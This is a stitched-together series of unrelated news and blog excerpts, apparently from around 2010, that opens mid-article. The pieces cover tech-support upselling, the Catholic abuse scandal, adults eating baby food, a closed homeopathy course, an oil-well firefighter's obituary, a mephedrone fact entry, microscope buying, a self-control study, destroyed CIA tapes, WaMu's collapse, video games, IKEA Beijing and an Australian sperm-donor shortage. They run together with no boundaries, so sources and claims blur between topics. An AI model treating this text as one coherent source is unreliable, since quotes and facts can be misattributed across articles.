In the case of a malware infestation , we have a dedicated malware removal team which will do whatever it takes to get the customer clean , including remoting in and cleaning a system . "
Not only that , Sunbelt 's tech support team is entirely U.S. - based .
What You Can Do
If you can't install your security software and tech support insists that the only solution is an extra- cost expert cleanup , do n't accept .
Disconnect and try another technician , if you have to , or a supervisor .
If they really can't or wo n't help , ask for your money back .
You bought the software ; you deserve the opportunity to use it .
Blow the whistle if tech support goes truly out of line .
Save a transcript of your session and send it to me .
I 'll do my best to get you the support you deserve and , if necessary , follow up with another report like this one .
The Pope is playing the victim card .
He ’s the one being tested :
Pope Benedict XVI sees the priestly sex scandal as a “ test for him and the church , ” his spokesman says , as bishops around Europe used Holy Week ’s solemn call for penitence to pledge transparency in dealing with the abuse of children .
But amid such signs of humility , a senior cleric also mounted a sharp counterattack to the allegations now swirling around the papacy .
In an article , the official accused The New York Times of faulting the pope unfairly for his treatment of past abuse allegations .
Oh , yes , the poor , poor Pope .
But , this is n’t new .
Church leaders have known about this problem for over 50 years .
Before anyone starts feeling sorry for the Pope ( not that I think any AMERICAblog readers will ) , check out this report from NPR .
American bishops are sending priests accused of abuse back to work .
The report notes the case of Rev. Eric Swearingen , who was accused of abuse in a case that was settled by the Diocese .
Now , with the support of his Bishop , Swearingen “ serves as priest at Holy Spirit parish in Fresno , where he also oversees the youth ministry . ” :
Swearingen ’s case is not an isolated one , says Anne Barrett Doyle , who works with the watchdog group BishopAccountability.org .
She says that recently , bishops have started quietly returning to ministry priests who previously have been accused of abuse .
“ I think they feel that the crisis has died down in the public mind , ” she says .
“ Therefore , they have some confidence that if they go ahead and reinstate these priests , that they ’ll get very little backlash . ”
Doyle and others have identified about a dozen clergy who have been accused , arrested or sued for abuse and returned to ministry .
She says the process for investigating priests is secret , and often the diocese says nothing about the charges against a priest when it returns him to ministry .
Nothing has changed .
The Catholic Bishops are doing what they ’ve done for decades .
Decades .
I get that there are fewer and fewer priests around , but that the Catholic Bishops are allowing this undermines any remaining shred of their credibility .
These Catholic leaders have no moral authority .
None .
Ca n't be bothered to chew your food ?
Too tired to cook and looking for a quick meal ?
It seems that in such circumstances a growing number of adults may consider opening a jar of baby food .
The world 's largest baby food manufacturer , Hipp , has said an increasing number of adults are turning to its pre-cooked , pureed meals because they find them easier to swallow and digest .
About a quarter of those who eat the Bavaria - based firm 's 100 varieties of pulped meals – from apple and cranberry breakfast to vegetable and beef hotpot – are adults , it says .
Claus Hipp said in recent years his firm 's products had grown in popularity , particularly among elderly people , with stewed apple said to be a favourite .
He said the 50 - year - old company – the world 's largest producer of baby food , with 46 % of the market – was increasingly turning its attention to the adult market rather than babies as Europe 's population ages .
" Not so long ago , we had twice as many births as now , and that , of course , has a knock - on effect .
As our society gets ever older , baby food is showing that it has a future in the adult market , " Hipp said at a company birthday celebration .
Despite the fact that birth rates have dropped in most European countries , most notably in Germany , the company 's profits rose by € 90 m last year to € 500 m ( £ 450 m ) .
A million and a half jars of baby food come off the Hipp production line every day .
Hipp said calorie - conscious new mothers saw the meals – which are low in fat , sugar and salt – as a way to help them lose weight after giving birth and were among new customers it had won in recent years .
Sportsmen and women looking for a light meal are believed to favour the jars , too .
The company , which recommends its organic meals to babies " at the start of weaning to three years of age " , and makes no mention on its packaging of anyone above that age , said it had no intention of relaunching the products for a separate market .
" Older people can often cope with the mashed baby food better than regular meals , but we 're not planning to change our advertising to target them … we want to keep our baby image , " said Hipp , whose father , Georg , started putting baby food in jars in 1960 .
Eileen Steinbock , of the British Dietetic Association , said pureed food could benefit people whose ability to swallow had been greatly reduced through old age , dementia or a stroke , and was already in widespread use in care homes .
But people who could still chew and swallow should continue to do so for as long as possible , she added .
" I would n't like to see people being given pureed food just because it 's easier for a carer to give it to them that way .
It should only be given when it 's appropriate or essential , " she said .
In addition , the protein content of food declines when it is pureed because extra water is added to help liquify it , leaving it with fewer calories .
" That would be a bad thing because a lot of people who require pureed food find it hard to eat enough and are quite likely to be nutritionally compromised and possibly even malnourished , " she added .
Yet another university has stopped its homeopathy course .
The particular interest of this course was that it was being run at Robert Gordon University , Aberdeen , the vice - chancellor which was Michael Pittilo , until his recent premature death .
Pittilo is the person who recommended to the government that herbalists and Chinese medicine practitioners should get honours degrees and be regulated like doctors .
His report , was , in my opinions , disastrously bad .
It recently emerged that this , very bad , advice would not be accepted by the Department of Health ( DH ) , so the campaign against the Pittilo proposals , on this blog and elsewhere was successful .
The alternative DH proposals look pretty silly , but we wo n’t really know until after the election exactly what will happen .
Robert Gordon University ( RGU ) : is the ‘ post - 1992 ’ university in Aberdeen , as opposed the the University of Aberdeen ( where my son is at the moment ) .
Much of RGU does an excellent job , but like so many post - 1992 universities they harm themselves by running courses in barmy alternative medicine .
RGU ran an Introduction To Homeopathy module ( saved 9 April 2010 ) .
In July 2009 , I asked RGU to see some samples of the teaching materials on this module , partly as part of the campaign against Pittilo ’s proposals .
I asked to see the powerpoints and handouts for three lectures , ( 1 ) evidence for homeopathy , ( 2 ) first aid remedies , and ( 3 ) allergies .
In September 2009 , this request , made under the Freedom of Information Act ( Scotland ) , was , as always , rejected by RGU , though they did tell me that the evidence lecture had been produced by a lecturer from The Faculty of Homeopathy and the other two had been produced by a local GP .
So , as usual , I asked for the mandatory internal review of the decision .
In October , the review upheld the original decision , as they almost always do .
I referred the decision to the Scottish Information Commissioner ( the law is slightly different in Scotland ) and they have still not responded .
But on 8 April 2010 I got a letter from RGU .
“ The above course requested is no longer part of the School of Nursing and Midwifery ’s provision , and it was cessated [ sic ] in Semester One 2009 / 10 .
This followed a formal review of all Nursing and Midwifery modules and their viability .
In the light of this the university has decided to release the information . ”
So yet another university has done the sensible thing .
The course has been shut .
Just for the record , I ’ll reproduce a few of the slides from the lecture on “ homeopathic remedies for allergies ” .
Allergies can be dangerous , and occasionally lethal .
To treat them with homeopathic pills , medicines that contain no medicine , is not just delusion , but a dangerous delusion which risks the lives of patients .
The " remedies " include nettles , sulphur , petroleum and arsenic .
They ’d be pretty scary but in fact the pills contain , in most cases , not a jot of nettle , sulphur , petroleum or arsenic .
Homeopathic pharmacies stock thousands of bottles of identical sugar pills , each with a different label .
These dangerous delusions were being taught as fact in a UK university .
The shame of it ..
A joke has it that St. Peter was showing a Texan around heaven , with the Texan claiming that everything he saw was better in Texas .
St. Peter tired of the routine and pointed to the fire of hell .
“ Do you have anything like that in Texas ? ” he asked .
The Texan said no , then added , “ But there are a couple good old boys in Houston who can put it out for you . ”
Those good old boys would have been Boots Hansen and Coots Matthews , who worked with the celebrated oilfield firefighter Red Adair , then started their own company , Boots & Coots , to become legends themselves in the business of fighting oil well fires .
All three were technical advisers and inspirations for characters in the 1968 movie “ Hellfighters . ”
John Wayne portrayed Mr. Adair .
Mr. Matthews , like his colleagues , was an expert in the perilous art of detonating dynamite in oil well infernos to starve the fire of oxygen , thereby killing it .
Real hellfighters insist on the word “ kill ” over wimpier alternatives like “ extinguish . ”
Mr. Matthews died March 31 at the home in Humble , Tex. , where he had lived for 48 years , said his daughter , Sharon Scott .
He was 86 .
He had respiratory problems , she said , that might have been related to his breathing carcinogens for 54 years and his penchant for good cigars .
COMMON NAMES
Mephedrone ; 4 - MMC ; Meow Meow ; M- Cat ; Drone ; Bubbles
EFFECTS CLASSIFICATIONS
Stimulant ; Euphoriant
CHEMICAL NAME
2-Methylamino-1-(4-methylphenyl) propan-1-one
DESCRIPTION
4 - Methylmethcathinone is a synthetic stimulant with empathogenic effects .
Between 2007 and 2009 , it became available for purchase online , was used increasingly in Europe , Australia , and New Zealand , associated with several deaths , and , as a result , was controlled in some countries .
Because of the similarity in names , it is sometimes confused with ' Methedrone ' ( 4- methoxymethcathinone ) or ' Methylone ' ( bk - MDMA ) .
A Buyers Guide to Compound Microscopes for Mycology
Part 1
© Peter G. Werner
Original publication : Mycena News , April 2008
For those of us who have gotten into the study of mycology beyond the simple  Can I eat it ?  level , identifying mushrooms to species ( or maybe even noting previously undescribed species ) often comes down to noting differences in the fine anatomy of the mushroom .
And many of these fine features cannot be seen without the aid of a microscope .
There are many serious amateur mycologists who would likely be interested in learning mycology on this level , but balk at it because of the perception that a microscoperequires the investment of many thousands of dollars .
To many peoples surprise , its actually quite possible to buy a good light microscope for well under $ 1,000 .
While a microscope is a somewhat expensive investment , it is no more expensive than buying a good set of camera equipment .
However , like investing in camera equipment , it really helps to know what you re buying .
To that end , following my previous set of articles on camera equipment , I m contributing a couple of articles that will hopefully demystify microscopes for those considering buying one .
Compound and Stereo Microscopes
The first issue that needs to be discussed is whether one wants a compound or stereo microscope , or both .
A compound scope is probably what most people think of when they picture a microscope .
This is a microscope where you view a highly magnified image of a thin object mounted on a slide , with light that is transmitted through the image .
Many will also be familiar with stereo scopes ( aka  dissecting scopes ) .
These are microscopes where a larger object is viewed in three dimensions using light reflected from the surface of the object ( though stereo scopes are usually also capable of transmitted light illumination ) , typically at magnifications lower than those found on a compound scope .
As to what one needs for mushroom ID , I recommend having both .
A good stereoscope can help one see the surface features of a mushroom in much finer detail and is also helpful to have for specimen preparation for a compound scope .
However , if one has to choose just one , Id say get a compound scope .
The features you can see with a stereo scope can also generally be seen ( albeit with more difficulty ) with a good hand lens ; however , theres no substitute for a compound scope for viewing features like spores , cystidia , etc .
Because of space limitations , the rest of this article will be on the features of compound scopes .
At some point in the near future , Ill contribute a compound scope buying guide , which really deserves an article in and of itself .
New vs. Used
If one has $ 400800 to spend on a microscope , you can go either of two ways .
You can buy a brand new scope from a source like Microscope - Depot.com , which will probably be a generic 
Chinese - made scope , or an older used scope of a high - quality make like Zeiss or Nikon .
There are pros and cons for each .
New scopes will be clean and without risk of prior wear - and - tear .
However , no -name  Chinese scopes are not manufactured to as high of quality - control standards as the better - known name brands and may come with built - in problems .
If you buy from a reputable dealer and the scope is warrantied , you should be able return a bad scope for repair or exchange .
Another problem is that only a minority of generic Chinese scopes ( typically the more expensive ones in that range ) come with Köhler illumination systems , a feature I feel is essential in a good compound scope .
Older ( circa 1960s 1980s or even older ) compound scopes from high - end manufacturers , like old quality cameras , hold up well over time and are the workhorses of many university mycology labs to this day .
The downside of buying these is that one usually doesnt know the history of these scopes and whether theyve been used carefully or abused .
One can buy used scopes from professional microscope dealerships with a solid maintenance history ; however , one will typically pay two or three times as much for a scope from this source ( probably in the $ 1500 2000 range ) than one would from a source like eBay or Craigslist .
( In some cases , eBay scopes are sold by microscope specialists who clean and refurbish the scope ; this is a valuable perk in a used scope when available . )
I think Köhler illumination is essential both for getting even illumination and , more importantly , for limiting stray light that actually can interfere with getting the full resolution possible from your optical system .
A scope that s capable of Köhler illumination should have two essential components .
One is an Abbe - type ( or even better aplanatic or achromatic ) condenser that includes a movable diaphragm , a carrier that can be raised and lowered , and centering screws or some other kind of centering mechanism .
The other is a movable field diaphragm located somewhere adjacent to the light source itself .
Buying a Used Microscope
If one does decide to go the used route , ideally one should be able to see the scope before deciding to purchase it .
However , since most such scopes will probably be found over eBay or through some other mail - order source , this may not be possible .
Therefore , make sure your scope has a return guarantee , preferably without strings attached .
When evaluating a scope , the first thing to look for is whether the scope and its components are more or less clean , especially the lenses .
If there is dust or dirt , is it extensive ?
Are any lenses or other components delaminating or otherwise loose ?
And if there is dust or dirt , is it found merely on the outer components ( which are cleanable ) or in internal components , where it may not be possible to get to ?
First , try setting up the scope for Köhler illumination ( see the link I give later on how to do this ) and make sure it is possible to do so , up to the highest magnification .
The objectives and the condenser should be able to focus properly and the optical components should be alignable .
One should look at all of the objectives both in and out of focus to see if there is dirt in the light path .
Remove the objective and eyepiece lenses and the condenser and examine the lenses individually for dirt and delamination .
Even if the scope is clean and in good shape , if you buy a used scope without a history of either regular maintenance or refurbishment , one should consider taking the scope to a microscope service for cleaning and alignment .
This will probably run $ 100200 and should be considered in the cost of buying a used scope .
( I provide a list of Bay Area services in the links I provide after the article . )
Brands
Based on overall build quality and the availability of Köhler illumination features , I m pretty partial to used high - end scopes .
The best are ones made by the big four manufacturers ( Zeiss , Leitz / Leica , Nikon , and Olympus ) or the excellent microscopes once made by the now - defunct Wild Heerbrugg .
There are also a number of second tier manufacturers ( many also now - defunct or merged into larger companies ) , notably Reichert , American Optical , Meiji , Lomo , and Vickers , that many people swear by , even if they dont have quite the reputation of the top - tier companies .
( Also , some clarification is needed concerning Zeiss , because during the Cold War there were actually two Carl Zeiss companies , a situation Ill explain more about in the link to my blog , provided below . )
Of course , as with cameras , the quality of the scopes by each maker varies considerably between models , and all of the major manufactures made lines of simple student scopes that are generally not capable of Köhler illumination and are not generally research quality .
Lines of quality compound scope that I often see selling on eBay for good prices ( often under $ 600 ) include the Zeiss Standard ( which is what I have ) , Nikon Labophot , Reichert Microstar IV , and Meiji ML2000 .
American Optical 110 scopes are also good , though one must be cautious with these , as a disproportionate number of old AO scopes have ended up as door stop scopes in various university departments and Ive seen some extremely dirty and abusedlooking ones go up for sale .
In part 2 , Ill go into more detail about microscope components to look for , either as components of the system you re buying , or as upgrades .
And since there is more useful information and links than I can provide on this subject here , I refer the reader to the following link on my new mycology blog :
Self - Control Instantly Replenished by Self - Affirmation
When you feel weak , stating core values can be a quick and easy self - control booster .
People are rightly obsessed with self - control because they intuitively understand what studies have proven : that it is associated with all sorts of positive outcomes in life , like satisfying relationships and academic achievement .
Failures of self - control , however , have been linked with addiction , overeating , interpersonal conflict and underachievement .
Self - control can be hard to maintain , as most of us know to our cost .
One study has found that exercising self - control is such hard work , it measurably depletes our glucose levels ( Gailliot et al. , 2007 ) .
The same study also found that having a glass of lemonade afterwards can restore us to full power .
But not everyone appreciates the calories gained from a sugary drink or wants to wait while it is digested , so what other , quicker methods are there ?
Core values
Research on self - affirmation — thinking about your positive traits — has revealed that it can protect us from all sorts of automatic defensive responses .
Schmeichel and Vohs ( 2009 ) wondered if self - affirmation could work the same wonders in the realms of self - control .
Because often what exercising self - control means is avoiding our automatic response .
To find out participants were asked to carry out a task that required self - control : they had to write a story but without using the letters ‘ a’ and ‘ n ’ .
Participants then wrote about their core values , e.g. their relationship with their family , their creativity or their aesthetic preferences , whatever they felt was important to them .
Finally they were given a classic test of self - control : submerging their hand in a bucket of icy cold water , which , if you ’ve ever tried it , you ’ll know becomes very painful after a minute or two .
This group was compared with another that was allowed to use all the letters of the alphabet when writing their story , so did n’t have to exercise their self - control to the same degree ( in total there were 59 people in 4 experimental conditions ) .
Participants who could use any letters managed to hold their hands underwater for almost 80 seconds , on average .
However those who had written the stories without the ‘a ’s and ‘n ’s only managed 27 seconds .
This shows just how dramatically our self - control can be depleted .
No wonder people find it so difficult to avoid temptation .
However in the group that had to write the tricky story , then self - affirmed their core values , self - control did recover .
They managed to hold their hands underwater for an average of 61 seconds .
So it seems that self - affirmation can refuel depleted self - control .
Note that self - affirmation did n’t improve self - control for people who completed the easy - peasy story .
In other words the self - affirmation trick only works if you ’ve already taken a hit to your self - control .
Self - control top-up
In two more experiments the researchers asked why self - affirmation seems to have this beneficial effect on depleted self - control .
Once again it came down to the idea that thinking about core values puts our minds into an abstract , high - level mode .
This has been found to increase self - control ( also : how to unconsciously increase self - control ) .
So , the next time you feel your self - control ebbing away at work , with your personal projects or with your partner , think about what you most pride yourself on ; think about those things you hold dear , whatever they may be .
If this experiment is correct , then self - affirmation could help you discover new reserves of self - control .
Former CIA Director Porter Goss agreed with a 2005 decision to destroy interrogation videos showing waterboarding , but nobody told White House counsel Harriet Miers , who was “ livid ” to find out afterward , newly released CIA documents show .
The documents show that , despite Goss ’ agreement , officials almost immediately began worrying they ’d done something improper , foreshadowing a controversy that has lingered for years and remains under FBI investigation .
ADVERTISEMENT
The videos showed CIA interrogators using waterboarding , a simulated drowning technique , on terrorism suspect Abu Zubaydah .
The videos showed that interrogators did not follow the waterboarding procedures authorized by President George W. Bush ’s administration , the documents show .
Jose Rodriguez , the agency ’s top clandestine officer , worried the tapes would be “ devastating ” to the CIA if they ever surfaced , the documents show .
Rodriguez told Goss and others he “ felt it was extremely important to destroy the tapes and that if there was any heat , he would take it , ” according to a November 2005 e-mail .
Goss laughed , according to the e-mail , and said he ’d be the one to take the heat .
The e-mail then states : “ PG , however , agreed with the decision . ”
The author of the e-mail was blacked out , and it ’s not clear whether Goss agreed that destroying the tapes was a wise decision or whether he gave formal approval .
Goss has not discussed the matter publicly .
ADVERTISEMENT
The e-mails , released late Thursday by the Justice Department under a Freedom of Information Act request by the American Civil Liberties Union , showed that Bush ’s top lawyer , Miers , and her CIA counterpart , John Rizzo , were both angry the tapes were destroyed .
“ Rizzo is clearly upset because he was on the hook to notify Harriet Miers of the status of the tapes because it was she who had asked to be advised before any action was taken , ” reads a November 2005 e-mail from an unidentified CIA officer to the agency ’s No. 3 official , Kyle “ Dusty ” Foggo .
“ Apparently , Rizzo called Harriet this afternoon and she was livid . ”
The e-mail correctly predicts : “ Rizzo does not think this is likely to just go away . ”
ADVERTISEMENT
Years later , prosecutor John Durham is still investigating whether any crime was committed .
“ These documents provide further evidence that senior CIA officials were willing to risk being prosecuted for obstruction of justice in order to avoid being prosecuted for torture , ” ACLU lawyer Ben Wizner said .
“ If the Department of Justice fails to hold these officials accountable , they will have succeeded in their cover - up . ”
ADVERTISEMENT
CIA spokesman George Little said the agency continues to cooperate with that investigation .
“ We hope that this issue is resolved soon , ” Little said .
While Starcraft II still does n't have a hard release date , gamers who simply can't wait to play the real - time strategy game sequel no longer need to .
Customers who preorder Starcraft II from specialty retailer GameStop can now get access to the game 's closed beta .
The Terran battle armor is actually pretty spacious , sort of like a walk - in closet with heavy artillery .
For instant access , gamers can place their preorders in one of the retailer 's brick - and - mortar locations .
Those with slightly more patience can order through the GameStop Web site , which promises to e-mail the beta code and instructions on joining to customers within 24 hours of a preorder being placed .
( Orders can not be canceled once the code has been sent out . )
The Starcraft II beta program has been running since February and allows players to play a variety of multiplayer match types .
While it does n't include any of the single - player campaign mode , the beta does allow users to take on computer - controlled opponents in the standard multiplayer modes .
The first installment in the trifurcated Starcraft II series , Wings of Liberty , will focus on the human Terran campaign in single - player mode .
However , the multiplayer component will also let gamers wage interstellar real - time strategy warfare as the hivelike Zerg and technologically advanced Protoss factions .
For more on Starcraft II , which is expected to receive a concrete release date soon , check out GameSpot 's previous coverage .
Kerry Killinger , the deposed head of Washington Mutual , was in Congress this week protesting that the seizure of the Seattle - based bank on Sept. 25 , 2008 , was not only premature , it was “ unfair . ”
Had WaMu only been placed on the “ do not short list ” and thus protected from those nasty Wall Street speculators .
Had WaMu only been allowed to live a few weeks longer , it could have benefited from the increase in federal deposit insurance ( the per-person limit was raised to $ 250,000 from $ 100,000 ) .
Had WaMu only survived long enough to have its debt guaranteed by the FDIC .
In bemoaning the lack of federal handouts and guarantees , Killinger found reason to blame virtually everyone -- the regulators , Wall Street , even the bank ( JPMorgan Chase & Co. ) that exposed itself to losses when it scooped up WaMu ’s carcass .
The one person Killinger did not blame was the person who destroyed a sound , 100 - year - old banking institution with reckless and wildly speculative lending : himself .
Advertisement
Remarkably , Killinger testified : “ I believe WaMu should not have been seized and sold for a bargain price . ”
It ’s true that shareholders of WaMu got nothing .
It ’s also true that the previous spring , JPMorgan had offered to acquire WaMu in an unassisted transaction for $ 8 a share .
Killinger turned it down .
Having milked WaMu for , reportedly , more than $ 100 million in compensation ( including $ 24 million in 2006 ) , Killinger had good reason to want to keep the bank independent .
But with the possible exception of Angelo R. Mozilo of Countrywide Financial Corp. , arguably no banking executive did more harm to the fabric of the U.S. mortgage industry .
Killinger became chief executive in 1990 , at the age of 40 , when WaMu was a medium - size and conservatively run thrift .
He built it into a behemoth with 2,200 outlets .
Revealingly , he boasted to an interviewer in 2002 that he viewed WaMu “ as more retail than banking .
That ’s where the big payoff is . ”
Retailers are concerned with a single transactional moment -- when the sale is made .
Prudent bankers know that they do not reap their harvest until years later , when loans are repaid .
This distinction did not trouble Killinger in the slightest .
Advertisement
WaMu was run with one purpose only -- to issue loans , seemingly without regard to whether the borrower could repay them .
Court documents and testimony reveal that loan officers were discouraged from soliciting information from applicants ; a company flier with the catchy and revealing motto “ a thin file is a good file ” urged them to keep interviews brief .
In advertisements , casually attired WaMu employees poked fun at staid bankers in suits -- as if the prudent banking style that had maintained WaMu as a solvent institution since 1889 was not only antiquated but a minor embarrassment .
Even the bank ’s chief compliance and risk oversight officer was drafted into the effort to push loans out the door .
According to a memo she allegedly circulated , risk personnel at WaMu were to play a “ customer service ” role and to avoid imposing a “ burden ” on loan officers .
WaMu became a leader in issuing adjustable - rate mortgages and , especially , mortgages in which the borrower was allowed to defer a portion of the interest due .
Naturally , such mortgages were popular because the initial monthly payments were low .
But since part of the interest was deferred , the homeowner actually fell further into debt month after month .
Such mortgages were a trap almost guaranteed to result in massive foreclosures .
Advertisement
WaMu was betting it would be able to unload its mortgages in the capital markets ( where they were packaged as securities and sold to investors ) , and during the bubble years , it did .
However , as it noted in its 2006 annual report , if delinquency rates on mortgages were to rise , investors might have less appetite for the subprime and other risky loans that WaMu was peddling .
In short , Killinger ’s bank knew it was betting the ranch .
WaMu noted in its disclosures that its customers might be unable to afford their mortgages when their rates adjusted ; they were dependent on home prices continuing to rise .
The bank added : “ Appreciation levels experienced during the past five years may not continue . ”
When the inevitable occurred and home prices began to fall , the secondary market for mortgages shut down and WaMu was stuck .
In September 2008 , after Lehman Bros. failed , WaMu ’s depositors panicked .
Almost overnight , WaMu , the country ’s biggest thrift , lost 10 % of its deposits .
By then it was too late .
Two weeks after Lehman collapsed , WaMu was shut down -- by far the biggest bank failure in U.S. history .
Advertisement
Killinger says the regulators intervened too soon .
But according to a report prepared by the inspectors general for the Treasury Department ’s Office of Thrift Supervision and the Federal Deposit Insurance Corp. , leaked this week and released Thursday , regulators should have intervened sooner .
The report confirmed that WaMu failed mostly “ because of management ’s pursuit of a high - risk lending strategy that included liberal underwriting standards and inadequate risk controls . ”
Kerry Killinger has it wrong again .
This was not a bank that deserved federal bailouts and guarantees .
This was a bank that deserved to die .
And Killinger made it that way .
Roger Lowenstein is the author of a just - published book on the financial crisis , “ The End of Wall Street . ”
Gallery Archive : Apr 2010 ( 2 ) Mar 2010 ( 59 ) Feb 2010 ( 49 ) Jan 2010 ( 71 ) Dec 2009 ( 3 ) Nov 2009 ( 2 ) Oct 2009 ( 17 ) Sep 2009 ( 27 ) Aug 2009 ( 6 ) Jun 2009 ( 6 ) May 2009 ( 34 ) Apr 2009 ( 21 ) Mar 2009 ( 19 ) Feb 2009 ( 23 ) Sep 2008 ( 1 ) May 2007 ( 5 ) Apr 2007 ( 8 ) Mar 2007 ( 34 ) Feb 2007 ( 27 ) Jan 2007 ( 8 ) Dec 2006 ( 6 ) Nov 2006 ( 5 ) Oct 2006 ( 2 ) Aug 2006 ( 2 ) May 2006 ( 1 ) Apr 2006 ( 1 ) Feb 2006 ( 1 ) Jan 2006 ( 1 ) Nov 2005 ( 1 ) Sep 2005 ( 4 ) Aug 2005 ( 1 ) Jul 2005 ( 1 ) May 2005 ( 1 ) Mar 2005 ( 1 ) Jan 2005 ( 1 ) Jul 2004 ( 1 ) Jun 2004 ( 1 ) May 2004 ( 1 ) Dec 2003 ( 1 ) Aug 2003 ( 1 ) Sep 2002 ( 1 ) May 2002 ( 4 ) Oct 2000 ( 1 )
Crysis 2 is definitely one of the games that we are looking forward to in 2010 .
Coming to PlayStation 3 , Xbox 360 and PC later this year , Crysis 2 should be able to set a new benchmark in the visuals department again .
So how much has the game evolved since the last game ?
We decided to do a high definition screen shot comparison of both the games , so check it out .
The first screen is from Crysis 1 and the second one is from Crysis 2 .
NOTE : PLEASE CLICK THE INDIVIDUAL IMAGES TO SEE THEM IN HIGH DEFINITION
Comparison 1
Comparison 2
Comparison 3
Comparison 4
Comparison 5
Considering the fact that Crytek are using an updated engine so it is quite obvious that Crysis 2 definitely looks better than the original .
With almost a year left for development we could only imagine how the final game will look like .
Ca n’t get more of the game , check these high definition images from Crysis 2 below :
NOTE : PLEASE CLICK THE INDIVIDUAL IMAGES TO SEE THEM IN HIGH DEFINITION
Thoughts ?
Let us know in the comments section below .
With no plans one Saturday , Zhang Xin told his wife , son and mother to wear something smart and hop into the family sedan .
He could have taken them to the Forbidden City or the Great Wall , but he decided on another popular destination -- IKEA .
Riding an escalator past a man lying on a display bed with a book opened on his belly , the clan sauntered into the crush of visitors squeezing onto the showroom path , bumping elbows and nicking ankles with their yellow shopping trolleys .
Zhang said the family needed a respite from the smog and a reliable lunch .
“ We just came here for fun , ” said the 34 - year - old office manager .
“ I suppose we could have gone somewhere else , but it would n’t have been a complete experience . ”
Advertisement
Welcome to IKEA Beijing , where the atmosphere is more theme park than store .
When the Swedish furniture giant first opened here in 1999 , it hoped locals would embrace its European brand of minimalism .
A decade later , Beijingers have done just that .
Perhaps too much .
Every weekend , thousands of looky - loos pour into the massive showroom to use the displays .
Some hop into bed , slide under the covers and sneak a nap ; others bring cameras and pose with the decor .
Families while away the afternoon in the store for no other reason than to enjoy the air conditioning .
Visitors can’t seem to resist novelties most Americans take for granted , such as free soda refills and ample seating .
They also like the laid - back staffers who do n’t mind when a child jumps on a couch .
Advertisement
Purchasing anything at Yi Jia , as the store is called here , can seem like an afterthought .
“ It ’s the only big store in Beijing where a security guard does n’t stop you from taking a picture , ” said Jing Bo , 30 , who was looking for promising backdrops for a photograph of his girlfriend .
The store ’s success can be traced , in part , to how grounded it is in the capital ’s zeitgeist .
At a time when home ownership is more within reach and incomes are rising , IKEA offers affordable , modern furniture to an emerging middle class clamoring to be bai ling , or white collar .
It does n’t hurt either that the understated style is a satisfying departure from , say , the faux French imperial designs favored by the older nouveaux riches and gaudy hotels .
Advertisement
“ Our values are changing , ” said Lizzy Hou , 25 , a university graduate who moved to Beijing in May from neighboring Hebei province for a teaching job .
“ We want to be modern .
I think IKEA stands for a kind of lifestyle .
People do n’t necessarily want to buy it , but they want to at least experience it . ”
Imagining the possibilities here is one of the reasons Bai Yalin drove an hour and a half from her apartment to spend a day at the store with her 7 - year - old son and two teenage nieces .
There are few other indoor spaces , she said , where she can entertain the children free on an oppressive summer afternoon .
Bai mapped out a five - hour outing .
First , they had hot dogs and soft ice cream cones at noon .
Then they enjoyed a long rest lounging on the beds .
Bai kicked off her sandals and sprawled out on a Tromso bunk bed .
The 36 - year - old homemaker made herself comfortable and even answered passing shoppers ’ questions about the quality of the mattress .
Advertisement
“ It ’s soft and a great buy at this price , ” she told a young woman , pointing to a dangling price tag .
After that , Bai and her family took group pictures .
By 5 p.m. , it was time for another meal , so they headed to the cafeteria and ate braised mushrooms with rice .
Bai and her husband , a clerk at a heating company , have bought plates and cups at IKEA , but what they ’d really like one day is to rid themselves of their clunky old Chinese furniture and bring on the do - it - yourself particleboard .
“ Today we did n’t plan to buy anything , just eat and rest , ” Bai said .
Advertisement
Many others arrive with the same intentions , sometimes bringing a book to read on a bouncy Poang armchair or carrying stuffed toys for their children to play with on a mattress .
For the midday squatters , the abundance of seating is no small detail in a country of 1.3 billion where nabbing a subway or bus seat is practically a blood sport .
The store ’s nerve center is the cafeteria .
The lunch hour is an endurance contest .
Hungry customers pace the dining room balancing overflowing trays , ready to pounce the second a table becomes available .
Beijingers have scarfed down their fair share of Swedish meatballs .
Most , however , seem to favor Chinese food such as marinated pork belly with tofu .
It was the prospect of a satisfying and inexpensive meal that brought Luo Jing and her mother , sister and boyfriend into IKEA for the first time one Saturday .
The group was resting in the sofa section , each carrying waxy paper cups worn in by one soda refill after another .
Advertisement
“ We ’ve heard a lot about IKEA but never came , ” said Luo , 23 .
“ I like the simplicity .
My mom liked the food .
We ’ll hang out for a while . ”
Though frustrated , IKEA executives hope browsers like Luo will eventually turn into buyers .
That ’s why they do n’t shoo anyone away for sleeping .
It ’s the promise of China ’s middle class that has girded their investment here .
The privately owned company operates seven stores in China , though there have been indications that profit remains elusive .
“ The brand awareness is great , but the question is , how do we get people to open up their wallets and spend money ? ” said Linda Xu , a company spokeswoman who rolled her eyes when she came upon a trio of slumbering customers .
When Wal - Mart and the French supermarket chain Carrefour entered China in the 1990s , many flocked to the new stores just to look and touch .
Now millions of Chinese shop there every day .
Advertisement
IKEA has the added challenge of copycats .
Brazen customers are known to come in with carpenters armed with measuring tapes to make replicas .
Zhang , the office manager visiting with his family , said he bought a TV table and a couch elsewhere that looked just like IKEA furniture .
“ Why spend so much money when you can have the same thing cheaper ? ” he said .
Others take pictures of the displays to learn how to decorate their homes .
“ I never knew you could just screw a shelf onto the wall , ” said Fan Haiying , 29 , contemplating how to store her books and photographs .
“ Traditional Chinese furniture always needs a cabinet door . ”
Advertisement
Then there are the amateur photographers who revel in the store ’s ambience .
To them , consumerism never looked so fine through a viewfinder .
A group of university graduates recently donned caps and gowns for photographs by the checkout aisles as if to capture the moment they matriculated to the middle class .
On another day , He Peng showed up with his compact Sony digital camera , which he uses to snap Beijing ’s modern landmarks .
He shot the Bird ’s Nest Olympic stadium and the Apple Store in a tony outdoor shopping mall , then set his sights on IKEA .
“ There ’s so much great stuff here , ” said He , 23 .
“ I did n’t know where to start . ”
Advertisement
He photographed his friends beating each other with stuffed toys .
Then he methodically went through the store , snapping away at beds , kitchen counters and even the extra-long hot dogs at the snack bar .
He posted the photos on his blog , at photo.blog.sina.com.cn/biohazardhp .
His caption above a shot of IKEA products reads , “ I do n’t need to buy them because I have pictures . ”
--
Advertisement
david.pierson@latimes.com
THE QUEENSLAND city of Townsville has turned to the US for sperm donations as Australia faces a critical shortage , the Townsville Bulletin reports .
Queensland Fertility Group , the largest fertility clinic in Townsville , 1300 kilometers from Brisbane , pays more than $ 700 an ampule for sperm imported from the U.S .
In the past , clinics used to rely on university students who were short on cash to donate sperm but these days not enough north Queensland men , or even Australian men , are prepared to donate .
Infertility specialist Dr Ron Chang attributed this decline to recent changes to the law that mean sperm donors have to be contactable once the child they helped to conceive turns 18 .
